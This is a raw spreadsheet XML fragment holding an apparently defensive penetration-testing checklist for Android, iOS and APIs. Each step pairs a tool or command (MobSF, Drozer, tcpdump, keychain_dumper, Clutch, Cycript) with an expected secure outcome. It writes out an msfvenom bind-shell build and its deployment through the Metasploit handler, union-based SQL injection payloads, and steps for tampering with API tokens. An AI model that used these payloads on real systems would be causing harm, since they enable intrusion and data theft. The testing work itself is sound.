docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest</t>
  </si>
  <si>
    <t>The mobSF should be started properly and the the URL should be displayed which gives details on which port the MobSF is listening</t>
  </si>
  <si>
    <t>Open the browser and copy-paste or enter the URL displayed when you started the MobSF</t>
  </si>
  <si>
    <t>The MobSF UI should get launched</t>
  </si>
  <si>
    <t>Drag and drop the APK file on the section above upload and analyze button</t>
  </si>
  <si>
    <t>The APK file should be uploaded successfully</t>
  </si>
  <si>
    <t>Click on Analyze button</t>
  </si>
  <si>
    <t>The static analysis of the APK should start and once the analysis is done, the report should be generated on the same browser</t>
  </si>
  <si>
    <t>Open the report and analyse it.
Make sure you click on all the tabs on the lfet-pane to verify any vulnerabilities in the APK file</t>
  </si>
  <si>
    <t>There shouldn't be any issues with Android manfest.xml and the other parts of the APK</t>
  </si>
  <si>
    <t>Now click on the 'Start Dynamic Analysis' on the left pane of the MOBSF UI and click on Create Environment</t>
  </si>
  <si>
    <t>This should automatically connect to emulator and install the APK under test and start the scan</t>
  </si>
  <si>
    <t>Verify the report for any vulnerabilities</t>
  </si>
  <si>
    <t>The application shouldn't have any major vulnerabilities in it</t>
  </si>
  <si>
    <t>Automatic Application Security assessment using Drozer</t>
  </si>
  <si>
    <t>Pre-Condition: The Drozer server should be installed on the VM and Drozer should APK should be installed on one of the emulator</t>
  </si>
  <si>
    <t>Open the Drozer client application on the emulator and keep the Embedded server ON</t>
  </si>
  <si>
    <t>The app should be opened successfully and it should be listening to 31415 port number</t>
  </si>
  <si>
    <t>Open the console in the VM and enter below command for port forwarding
./adb forward tcp:31415 tcp:31415</t>
  </si>
  <si>
    <t>The command should get executed successfully</t>
  </si>
  <si>
    <t>Open a different console and enter the below command
drozer console connect</t>
  </si>
  <si>
    <t>Drozer should get connected and you should get drozer console</t>
  </si>
  <si>
    <t>Run the command app.package.info</t>
  </si>
  <si>
    <t>This should display the full list of permission that installed currently on the emulator</t>
  </si>
  <si>
    <t>Find the package name of the APK / application under test and run below command 
run app.package.attack surface "Name of the package"</t>
  </si>
  <si>
    <t>This should give the details on activities, broadcast receivers, content providers and services</t>
  </si>
  <si>
    <t>Now run the below command 
run scanner.provideer.finduris -a "Name of the package"</t>
  </si>
  <si>
    <t>Check if we get any URLs with the status 'Able to query'</t>
  </si>
  <si>
    <t>There shouldn't be any URLs with that status. If yes, then that means that the information provide by those content providers can be accessed by other applications</t>
  </si>
  <si>
    <t>Now run the below command
run app.provide.query "Copy the URLs you go the previous step"</t>
  </si>
  <si>
    <t>The output shouldn't contain any sensitive information</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Now lets append the query and execute below command
run app.provide.query "Copy the URLs you go the previous step" --project "</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>'</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>"</t>
    </r>
  </si>
  <si>
    <t>This shouldn't give any table information</t>
  </si>
  <si>
    <t>If the previous step gives any table information, then run below command
run scanner.provide.sqltables -a "Name of the package"</t>
  </si>
  <si>
    <t>This shouldn't give any table details</t>
  </si>
  <si>
    <t>Sniffing</t>
  </si>
  <si>
    <t>Pre-Condition: The Wireshark and tcpdump tools should be installed on the VM. 
The Android Studio and the emulator should be running with the APK installed in the emulator</t>
  </si>
  <si>
    <t>Open a command prompt in the VM and enter below command
./adb shell</t>
  </si>
  <si>
    <t>The command should be executed properly</t>
  </si>
  <si>
    <t>Now run the below command
tcpdump -d -s 0 -w /tmp/capturepacket.pcap</t>
  </si>
  <si>
    <t>The tcpdump scanning tool must start scanning</t>
  </si>
  <si>
    <t xml:space="preserve">Now open the application in emulator and start using the app. Try few scenarios like
Entering username and password, Access all pages where you can enter sensitive information 
</t>
  </si>
  <si>
    <t>The tcpdump should cpature all packets</t>
  </si>
  <si>
    <t>Now stop the tcpdump and go to temp folder</t>
  </si>
  <si>
    <t>capturepacket.pcap sile should be present in it</t>
  </si>
  <si>
    <t xml:space="preserve">Now open wireshark and open the capturepacket.pcap file in wireshark
</t>
  </si>
  <si>
    <t>The file should open in the wireshark</t>
  </si>
  <si>
    <t>Now search (CTRL+F) for sensitive information in wireshark by entering the sensitive information you have enetered in previouys steps</t>
  </si>
  <si>
    <t>The sensitive information should be encrypted and shouldn't be captured as part of the tcpdump</t>
  </si>
  <si>
    <t>Intent Sniffing</t>
  </si>
  <si>
    <t>Pre-Condition: The intent sniffing should be installed on the Emulator. 
The Android Studio and the emulator should be running with the testing APK installed in the emulator</t>
  </si>
  <si>
    <t>Open the Intent Sniffing application</t>
  </si>
  <si>
    <t>The app should be opened successfully</t>
  </si>
  <si>
    <t>Now open the application under test and try scenarios like, login, password change, OTP, etc</t>
  </si>
  <si>
    <t>Go to the intent sniffing app and check if any sensitive information is captured in Intent sniffing application screen</t>
  </si>
  <si>
    <t>Any sensitive information shouldn't be captured in the Intent Sniffing application</t>
  </si>
  <si>
    <t>Sniffing through Android Studio</t>
  </si>
  <si>
    <t>Pre-Condition: The Android Studio and the emulator should be running with the APK installed in the emulator</t>
  </si>
  <si>
    <t>Open the Android Studio and start running the adb logcat application / click on the Android Monitor option in the Android Studio</t>
  </si>
  <si>
    <t>The logcat should start running</t>
  </si>
  <si>
    <t xml:space="preserve">Try few scenarios in the application like entering username and password, Access all pages where you can enter sensitive information 
</t>
  </si>
  <si>
    <t xml:space="preserve">Now open Android Monitor and check if any sensitive information is captured
</t>
  </si>
  <si>
    <t>The sensitive information should be encrypted and shouldn't be captured in logcat or Android Monitor</t>
  </si>
  <si>
    <t>Analysis of Android-Manifest.xml file</t>
  </si>
  <si>
    <t>Verification of intent filters</t>
  </si>
  <si>
    <t>Using MobSF for testing</t>
  </si>
  <si>
    <t>Verification of APK components</t>
  </si>
  <si>
    <t>Using Drozer for Android Pen Testing</t>
  </si>
  <si>
    <t>Verification of Weak Server side Controls</t>
  </si>
  <si>
    <t>Verification of Insecure Data storage</t>
  </si>
  <si>
    <t>Verification of Insuffucient Transport layer protection</t>
  </si>
  <si>
    <t>Verification of Unintended data leakage</t>
  </si>
  <si>
    <t>Verification of poor authorisation and authentication</t>
  </si>
  <si>
    <t>Verification of Broken cryptography</t>
  </si>
  <si>
    <t>Verification of client side injection</t>
  </si>
  <si>
    <t>Verification of Security decisions vis untrusted inputs</t>
  </si>
  <si>
    <t>Verification of Improper Session Handling</t>
  </si>
  <si>
    <t>Verification of Lack of Binary Protection</t>
  </si>
  <si>
    <t>Sensitive file verification</t>
  </si>
  <si>
    <t>sqlite file verification</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the .db file of an app under testing</t>
  </si>
  <si>
    <t>Pre-Condition: The jailbroken phone is available and connected to the Mac system. The app is installed in the device</t>
  </si>
  <si>
    <t>The jailbroken device and the mac machine is connected to same network</t>
  </si>
  <si>
    <t>The sqlite3 should be installed in Mac</t>
  </si>
  <si>
    <t>Open the command prompt in the Mac system</t>
  </si>
  <si>
    <t>Connect to the iphone by entering ssh root@&lt;ip address of the iphone device&gt;</t>
  </si>
  <si>
    <t>User should be able to login to the iphone device</t>
  </si>
  <si>
    <t>Open the app in device and login to the app or visit some of the pages in app where you can enter sensitive information</t>
  </si>
  <si>
    <t>Now go back to command prompt and enter cd /var/mobile/Applications/</t>
  </si>
  <si>
    <t>All the different folders hould be displayed for the respective apps installed in the device</t>
  </si>
  <si>
    <t>Enter the command find -name "App name"</t>
  </si>
  <si>
    <t>The respective folder name should be displayed</t>
  </si>
  <si>
    <t>Enter cd "Folder name listed from previous step</t>
  </si>
  <si>
    <t>User should get into the respective app folder</t>
  </si>
  <si>
    <t>If the app has Documents folder, then enter cd Documents command</t>
  </si>
  <si>
    <t>User should be navogated to Documents folder</t>
  </si>
  <si>
    <t>Now enter ls and check if the .db file is present in the folder</t>
  </si>
  <si>
    <t>Open a new command prompt and enter command sftp root@&lt;ip address of the iphone device&gt;</t>
  </si>
  <si>
    <t>Usre should be logged in successfully</t>
  </si>
  <si>
    <t>Now enter the command get /var/mobile/Applications/&lt;Folder Name&gt;/Documents&gt;/&lt;DB file name&gt;</t>
  </si>
  <si>
    <t>This should download the file into the Mac system i.e. from wherever you have copied the file</t>
  </si>
  <si>
    <t>Now enter the command sqlite3 &lt;Db file name&gt;</t>
  </si>
  <si>
    <t>sqlite prompt should be displayed</t>
  </si>
  <si>
    <t>Enter .tables command to display list of tables and do select * from &lt;table name&gt; for each table to check if there are any sensitive information saved</t>
  </si>
  <si>
    <t>There should not be any sensitive information saved in the .db file</t>
  </si>
  <si>
    <t>plist file verification</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the plist file of an app under testing</t>
  </si>
  <si>
    <t>Now enter ls and check if the .plist file is present in the folder</t>
  </si>
  <si>
    <t>If the plist is in XML format, the file will be opened</t>
  </si>
  <si>
    <t>Check if there are any sensitive information saved in plist file</t>
  </si>
  <si>
    <t>There should not be any sensitive information saved in the .plist file</t>
  </si>
  <si>
    <t>NSUser degfualts verification</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the NSUser default class</t>
  </si>
  <si>
    <t>Open the app in device and login to the app and also visit some of the pages in app where you can enter sensitive information</t>
  </si>
  <si>
    <t>If the app has Documents folder, then enter cd Library/preferences command</t>
  </si>
  <si>
    <t>User should be navogated to preferences folder</t>
  </si>
  <si>
    <t>Core data verification</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the .sqlite file of an app under testing</t>
  </si>
  <si>
    <t>Open the app in device and login to the app ans also visit some of the pages in app where you can enter sensitive information</t>
  </si>
  <si>
    <t>Enter cd "Folder name listed from previous step"</t>
  </si>
  <si>
    <t>Now enter ls and check if the .sqlite file is present in the folder</t>
  </si>
  <si>
    <t>Now enter the command get /var/mobile/Applications/&lt;Folder Name&gt;/Documents&gt;/&lt;sqlite filename file name&gt;</t>
  </si>
  <si>
    <t>Now enter the command sqlite3 &lt;sqlite file name&gt;</t>
  </si>
  <si>
    <t>Enter .tables command to display list of tables and now enter select * from &lt;table name&gt; for any table which starts with "Z" for core data and check if there are any sensitive information saved</t>
  </si>
  <si>
    <t>There should not be any sensitive information saved in the .sqlite file</t>
  </si>
  <si>
    <t>Keychains verification</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the keychains file on the app under testing</t>
  </si>
  <si>
    <t>Keychains.zip file is downloaded in the Mac</t>
  </si>
  <si>
    <t>Open the command prompt in the Mac system and goto the folder where Keychains.zip is present</t>
  </si>
  <si>
    <t>Enter the command sftp root@&lt;ip address of the iphone device&gt;</t>
  </si>
  <si>
    <t>User should be able to connect to the iphone device</t>
  </si>
  <si>
    <t>Now enter the command put &lt;Keychain.zip file name&gt; /tmp</t>
  </si>
  <si>
    <t>Enter cd /tmp command</t>
  </si>
  <si>
    <t>User should be navigated to tmp folder</t>
  </si>
  <si>
    <t>Enter command unzip &lt;keychains zip file name&gt;</t>
  </si>
  <si>
    <t>This should unzip the file and there should be a Keychains master folder</t>
  </si>
  <si>
    <t>cd Keychain-Dumper-master</t>
  </si>
  <si>
    <t>There should be an executable file keychain_dumper</t>
  </si>
  <si>
    <t>Now run the command ./keychain_dumper and verify if there are any sensitive information displayed in the keychain for our application</t>
  </si>
  <si>
    <t>There should not be any sensitive information displayed in the keychain for our application</t>
  </si>
  <si>
    <t>Unintended data leakage</t>
  </si>
  <si>
    <t>Logging verification</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the syslog files which usually have information for debugging purposes</t>
  </si>
  <si>
    <t>iPhone configuration utility is installed in the Mac device</t>
  </si>
  <si>
    <t>Connect the iphone device to the Mac machine and launch iPhone configuration utility aplication and click on 'Console' tab</t>
  </si>
  <si>
    <t>The console tab should be opened successfully</t>
  </si>
  <si>
    <t>Launch the application under test and interact with app with activities as mentioned below (If the app has these functionalities. Main logic is to access any sensitive area of the app)</t>
  </si>
  <si>
    <t>1. Login</t>
  </si>
  <si>
    <t>2. Register</t>
  </si>
  <si>
    <t>3. Search</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if the sensitive information enetered in the application is displayed in console in iPhone configuration utility application </t>
  </si>
  <si>
    <t>The sensitive information should not be displayed in the console</t>
  </si>
  <si>
    <t>Application Backgrounding</t>
  </si>
  <si>
    <t>Verify if any sensitive information screenshot is taken when the application is running in the background</t>
  </si>
  <si>
    <t>Open the app in device and then enter sensitive information into the app like login, password or anything. Do not click on login or close the app, just minimise the application</t>
  </si>
  <si>
    <t>Noe enter the command cd Library/Caches/Snapshots/&lt;com.App Name folder&gt;/Main</t>
  </si>
  <si>
    <t>User should be navigated to the respective folder</t>
  </si>
  <si>
    <t>Now open a new command prompt and enter command sftp root@&lt;ip address of the iphone device&gt;</t>
  </si>
  <si>
    <t>Now enter the command get /var/mobile/Applications/&lt;Folder Name&gt;/Documents&gt;/Library/Caches/Snapshots/&lt;com.App Name folder&gt;/Main/&lt;Image name&gt;</t>
  </si>
  <si>
    <t>Now open the image and check if the screenshot of information you have entered while minimising the application is taken</t>
  </si>
  <si>
    <t>Screenshot shouldn't be there with sensitive information</t>
  </si>
  <si>
    <t>Keyboard cache</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the keyboard cache file</t>
  </si>
  <si>
    <t>User should be logged in successfully with sftp prompt</t>
  </si>
  <si>
    <t>Enter the command get /private/var/mobile/Library/Keyboard/&lt;.dat file name&gt; and press enter</t>
  </si>
  <si>
    <t>This should copy-paste the .dat file into the Mac machine</t>
  </si>
  <si>
    <t>Now open the .dat file in the Mac device and check if any sensitive information is captured</t>
  </si>
  <si>
    <t>There shouldn't be any sensitive information captured in the .dat file</t>
  </si>
  <si>
    <t>Pasteboard</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the pasteboard file</t>
  </si>
  <si>
    <t>Launch the application under test and interact with sensitive areas of the application like entering username, password. Do a long press and copy the username or password</t>
  </si>
  <si>
    <t>Now open a new app and try pasting the information copied from the app under test to this new app</t>
  </si>
  <si>
    <t>User should not be able to copy the information</t>
  </si>
  <si>
    <t>Verifying ClassDump file</t>
  </si>
  <si>
    <t>ClassDump file verificaton</t>
  </si>
  <si>
    <t>Verify if any sensitive information is present in the classdump file</t>
  </si>
  <si>
    <t>Clutch is installed on iphone device</t>
  </si>
  <si>
    <t>Class-Dump should be installed on iphone device</t>
  </si>
  <si>
    <t>Enter command ls to see if the .app file is present</t>
  </si>
  <si>
    <t>The .app file for the respective application should be present</t>
  </si>
  <si>
    <t>Open a new prompt and go to the folder where Clutch is installed</t>
  </si>
  <si>
    <t>Enter the command clutch and press enter key</t>
  </si>
  <si>
    <t>The app name under test should be displayed</t>
  </si>
  <si>
    <t>Now enter the command clucth "App Name" and press enter key</t>
  </si>
  <si>
    <t>This should crack the app and create a new .ipa file</t>
  </si>
  <si>
    <t>Now copy the pathe where the ipa file is created and enter cd "Path copied"</t>
  </si>
  <si>
    <t>Enter ls command</t>
  </si>
  <si>
    <t>The ipa file should be displayed</t>
  </si>
  <si>
    <t>Enter unzip "ipa file name" -d "New path to save unzipped folders" and press enter key</t>
  </si>
  <si>
    <t>This should successfully unzip the ipa file</t>
  </si>
  <si>
    <t>Enter the command ls and check if new folder is created</t>
  </si>
  <si>
    <t>The new folder should be created</t>
  </si>
  <si>
    <t>Now enter the command cd "New folder Name"/Payload/".app folder name"/</t>
  </si>
  <si>
    <t>User should be able to navigate to .app folder</t>
  </si>
  <si>
    <t>Now enter command class-dump "App folder name which is marked in green" &gt; "Destination Name"</t>
  </si>
  <si>
    <t>A new folder should be created with "Destination Name" given</t>
  </si>
  <si>
    <t>Now enter command vim "Destination Name" and check if user can access source code</t>
  </si>
  <si>
    <t>The source code should be obfuscated and it shouldn't have any sensitive information around the application</t>
  </si>
  <si>
    <t>Reverse Engineering using Hopper</t>
  </si>
  <si>
    <t>Verify if any sensitive information is disclosed in the assembler when we patch the application with Hopper</t>
  </si>
  <si>
    <t>Pre-Condition:  The app under test is installed on the simlator in Mac</t>
  </si>
  <si>
    <t>Hopper is installed on the Mac device</t>
  </si>
  <si>
    <t>Open the Mac system and launch the Hopper application on Mac device</t>
  </si>
  <si>
    <t>Hopper application should be launched successfully</t>
  </si>
  <si>
    <t>Click on File-&gt; Read Executable to Disassemble-&gt; User-&gt; &lt;Select respectiv user&gt; -&gt; Library-&gt; Developer-&gt; Core Simulator-&gt; Devices-&gt; &lt;Select the device where the app under test is installed&gt; Bundle-&gt; Application-&gt; &lt;Select the App folder&gt;-&gt;&lt;Select the App executable&gt; and the click Ok</t>
  </si>
  <si>
    <t>The app should be disassembled and all the details should be displayed in the Hopper application</t>
  </si>
  <si>
    <t>Click on Labels tab and check if there are any view controllers or App Delegates which are senstive to the application like Login, password reset, etc</t>
  </si>
  <si>
    <t>The disassembled details shouldn'y have any sensitive informaion</t>
  </si>
  <si>
    <t>Click on Strings tab and check if there are senstive informartion hardcoded as part of the message</t>
  </si>
  <si>
    <t>No sensitive informatiopn should be hardcoded on the messages under Strings tab</t>
  </si>
  <si>
    <t>Network Attacks</t>
  </si>
  <si>
    <t>Network Attacks on iOS Apps</t>
  </si>
  <si>
    <t>Verify user can access any backend information of the app using Kali Linux's MSFVEnom</t>
  </si>
  <si>
    <t>Kali Linux is installed on a different VM</t>
  </si>
  <si>
    <t>Log in to kali Linux and enter ifconfig command</t>
  </si>
  <si>
    <t>The list of network interfaces should be displayed</t>
  </si>
  <si>
    <t>Run the command nmap -sP &lt;IP range of VM where iphone simulator is running&gt;</t>
  </si>
  <si>
    <t>This should show list of Ips which are up along with the ports that open</t>
  </si>
  <si>
    <t>Run the command nmap -O &lt;IP of the VM where iOS simulator is running&gt;</t>
  </si>
  <si>
    <t>This should show the details of Operating Systme running on the iOS device</t>
  </si>
  <si>
    <t>Now run the command msfvenom -l to see the list of payloads</t>
  </si>
  <si>
    <t>The list of payload should be displayed</t>
  </si>
  <si>
    <t>Now find out the payload for iOs device and enter the command as mentined below</t>
  </si>
  <si>
    <t>This should create a malware file with the name bind_shell_malware</t>
  </si>
  <si>
    <t>msvenom -p osx/armle/shell_bind_tcp -f macho &gt; bind_shell_malware</t>
  </si>
  <si>
    <t>Connect to the iphone simulator through sftp by entering sftp root@&lt;IP Address of VM where iOS is running&gt; and then enter put bind_shell_malware</t>
  </si>
  <si>
    <t>This should copy-paste the malware into the iOS device</t>
  </si>
  <si>
    <t>Loginto iphone through ssh by entering ssh root@&lt;P of the VM where iOS simulator is running&gt;</t>
  </si>
  <si>
    <t>User should be logged in successfully</t>
  </si>
  <si>
    <t>Now do ls -l to check if the malware copied is present in the iOS device and then rund the command chmod +x bind_shell_malware to give executable access to the file</t>
  </si>
  <si>
    <t>The file should get executable access now</t>
  </si>
  <si>
    <t>Run the command ./bind_shell_malware</t>
  </si>
  <si>
    <t>The malware should be executed successfully</t>
  </si>
  <si>
    <t>Now go to kali and enter msfconsole</t>
  </si>
  <si>
    <t>This should give a command shell session to the user</t>
  </si>
  <si>
    <t>Enter the command use exploit/multi/handler</t>
  </si>
  <si>
    <t>Then enter the command set payload osx/armle/shell_bind_tcp</t>
  </si>
  <si>
    <t>Enter command show options</t>
  </si>
  <si>
    <t>Set the RHOST which is an IP address of iphone entering a command set RHOST &lt;IP Address of VM where iOS is running&gt; and press enter</t>
  </si>
  <si>
    <t>Now run the command exploit</t>
  </si>
  <si>
    <t>Now enter find -name *.db anc check if there are any .db file of the app under test.  If Yes, then enter sqlite3 &lt;.db file name of the app under test&gt;</t>
  </si>
  <si>
    <t>This should give acess to the .db file</t>
  </si>
  <si>
    <t>Enter .tables and check if it displays list of tables and verify if there are any sensitive data in these tables</t>
  </si>
  <si>
    <t>User should not be able to access the tables and the tables shouldn't contain any sensitive information</t>
  </si>
  <si>
    <t>Runtime Code Injection</t>
  </si>
  <si>
    <t>Runtime code injection using Cycript</t>
  </si>
  <si>
    <t>Verify user can inject a code using cycript</t>
  </si>
  <si>
    <t>Cycript is installed on the device</t>
  </si>
  <si>
    <t>Open the application under test in the phone and then enter command ps aux | grep &lt;App Name&gt;</t>
  </si>
  <si>
    <t>This should display the process id of the app running</t>
  </si>
  <si>
    <t>Now enter the command cycript -p &lt;Process id captured from previous step&gt;</t>
  </si>
  <si>
    <t>This should open cycript prompt</t>
  </si>
  <si>
    <t>Now you enter var myapp = UIApp to set the name of the variable to myapp</t>
  </si>
  <si>
    <t>The variable should be set to myapp</t>
  </si>
  <si>
    <t>Now enter [myapp openURL: [NSURL URLWithString: @"http://www.google.com"]] and press enter</t>
  </si>
  <si>
    <t>This shouln't open the google.com on top of the app  under test opened. If it does, then it’s a vulnrability</t>
  </si>
  <si>
    <t>App Analysis using snoop-it</t>
  </si>
  <si>
    <t>App analysis using snoop-it</t>
  </si>
  <si>
    <t>Verify if there are any vulnerability in the app using snoop-it</t>
  </si>
  <si>
    <t>Pre-Condition:  The app under test is installed on the simulator in Mac</t>
  </si>
  <si>
    <t>Snoop-it should be installed in the iphone</t>
  </si>
  <si>
    <t>Open the snoop-it app and tap on 'Select App Store Apps' and select the app under test installed on the phone</t>
  </si>
  <si>
    <t>Now go to Settings in the App and check the URL mentioned in there. Copy the URL and open that in a browser in Mac system</t>
  </si>
  <si>
    <t>Snoop-it will ask for username and password</t>
  </si>
  <si>
    <t>Open the application under test and enter username and password as snoop-t/snoopit</t>
  </si>
  <si>
    <t>User should be logged in and the app analsyis should be displayed</t>
  </si>
  <si>
    <t>Now check the files displayed on the left-handside tab of the browser and check if there is any sensitive information displayed</t>
  </si>
  <si>
    <t>There shouldn't be any sensitive information displayed about the application</t>
  </si>
  <si>
    <t>Verify if there are any SQL Injection issues on any fields in the application</t>
  </si>
  <si>
    <t>Open the the application and list out all the fields avaiable in the application Ex: Username &amp; Password field, first name ans last name field</t>
  </si>
  <si>
    <t>Enter ' or 1=1-- in the fields like username and password anc heck if user can login to the application</t>
  </si>
  <si>
    <t>User shouldn't be able to login to the application</t>
  </si>
  <si>
    <t>On the other fields found in the application, enter \ in all the input fields one by one.Verify if "\" throws an error on screen like the one mentioned in the bold (The error could also differ based on the SQL server which is used):-</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>"You have an error in your sql syntax. check the manual that corresponds to your MYSQL server version for the right      syntax to use near "\" Limit 0,1' at line 1"</t>
    </r>
  </si>
  <si>
    <t>2. Now we balance the query:- if you see the \ enetered in the field displayed in the error as "\" then you need to close the statement with double quotes as mentioned below.</t>
  </si>
  <si>
    <t>"   --     // Note: the payload for post based sql is --space, that is tap spacebar after -- once</t>
  </si>
  <si>
    <t>If it is handled with single quote like '\'</t>
  </si>
  <si>
    <t>'   --      // Note: the payload for post based sql is --space, that is tap spacebar after -- once</t>
  </si>
  <si>
    <t>If the above option doesn't work, then use below statements</t>
  </si>
  <si>
    <t>"   #</t>
  </si>
  <si>
    <t>'   #</t>
  </si>
  <si>
    <t>If the SQL error displayed before disappears, then we have successfully balanced the query</t>
  </si>
  <si>
    <t>Now we get to verify the number of columns by using below payload</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">' order by 10# </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>or</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ' order by 10--+ (Keep on reducing the order by number from 10 to 1 to verify how many columns are available)</t>
    </r>
  </si>
  <si>
    <t>or</t>
  </si>
  <si>
    <t>" order by 10# or " order by 99--+  (Keep on reducing the order by number from 99 to 1 to verify how many columns are available)</t>
  </si>
  <si>
    <t>The above mentioned payload will not throw any error if the number of columns were right. (Ex: If you put order by 100, it may throw error if the table doesn't have 100 columns and if you enter order by 4, it may not throw error as table has 4 columns)</t>
  </si>
  <si>
    <t>Once you figure out number columns in the table, use the below command to display the numer of vulnerable coulmns:-</t>
  </si>
  <si>
    <t>' union all select 1,2,3,.....so on#</t>
  </si>
  <si>
    <t>If the union select statements doesn't throw an error, we try to extract database and version number with command:-</t>
  </si>
  <si>
    <t>' union all select database(),user()#   or</t>
  </si>
  <si>
    <t>' union all select database(),user()--</t>
  </si>
  <si>
    <t>API PENTEST TEST CASES  FOR OWASP TOP 10</t>
  </si>
  <si>
    <t>1.Broken object level authorization</t>
  </si>
  <si>
    <t>Broken object level authorization</t>
  </si>
  <si>
    <t>Lack of Object level authorization on apikey or token leads to horizantal privilege escalation</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:https://api.target.com/users/1)
2.now try to tamper id's 1 to 2 and check response(ex:https://api.target.com/users/1 to https://api.target.com/users/2)
3.check response if you get 200 OK status code and details of user 2.</t>
  </si>
  <si>
    <t>proper access controls need to set.</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/users/1)
2.now open your command prompt and paste api call before clicking on enter tamper id value (1 to 2)
3.check response  details of user 2.</t>
  </si>
  <si>
    <t>1.Broken User Authentication.</t>
  </si>
  <si>
    <t>Broken user authentication</t>
  </si>
  <si>
    <t>Lack of Broken authentication allows user to access account without proper api_key  or token</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/users/1)
2.now open your command prompt  and paste api call you will get user details
3.now delete access_token in account and again try to access same api call and check if you get same response as we get before.note: Try to perform same action where ever we access api call using access_token or api_key</t>
  </si>
  <si>
    <t>There should be proper authentication.</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/users/1)
2.now open your command prompt  and paste api call you will get user details.
3.now genarate random string as same length as valid access_token. and again try to access same api call with random string instead of valid access_token and check if we get same details as above note: Try to perform same action where ever we access api call using access_token or api_key</t>
  </si>
  <si>
    <t>broken user authentication</t>
  </si>
  <si>
    <t>lack of Broken authentication allows user to access account without proper api_key  or token</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/users/1)
2.now open your command prompt  and paste api call you will get user details.
3.Now try to decode access_token and if you get your user name try to tamper it as admin or another username and encode it back.now again try same api call with tampered  access_token and check if we get response.note: Try to perform same action where ever we access api call using access_token or api_key</t>
  </si>
  <si>
    <t>there should be proper authentication.</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/users/1)
2.now open your command prompt  and paste api call you will get user details.
3.Now try to tamper api_key or access_token at the end .now again try same api call with tampered  access_token and check if we get response.note: Try to perform same action where ever we access api call using access_token or api_key</t>
  </si>
  <si>
    <t>there should be proper authentication.should not generate api key or access token as sequence.</t>
  </si>
  <si>
    <t>3.Exsessive Data Exposure</t>
  </si>
  <si>
    <t>Exsessive Data Exposure</t>
  </si>
  <si>
    <t>Leaking api_key or access token over public leads to sensitive data exposure</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.While test a target check anywhere api_key or access_token getting leaked.(like source code,response,github,robots.txt file)
2.now get an api_call for authenticated user replace api_key or access_token which where leads over public.
3.check if we get any sensitive details.</t>
  </si>
  <si>
    <t>api_keys and access_token should not leak over public</t>
  </si>
  <si>
    <t>4.Broken functional level authorization</t>
  </si>
  <si>
    <t>Broken Functional level authorization</t>
  </si>
  <si>
    <t>lack of Functional level authorization on apikey or token leads to vertical privilege escalation</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:https://api.target.com/users/1)
2.now try to tamper api_call as (ex:https://api.target.com/admin/users)
3.check response if you get 200 OK status code and details of admin.</t>
  </si>
  <si>
    <t>broken Functional level authorization</t>
  </si>
  <si>
    <t>pre-condition:
1.make sure you have your api_key or access_token to access your account.
2.you have an access to api_documentation or api calls.
steps:
1.Access api documentation and get an api call to access our account.(ex:curl -H "Authorization: Bearer token" \ https://api.target.com/users/1)
2.now open your command prompt  and paste api call you will get user details.
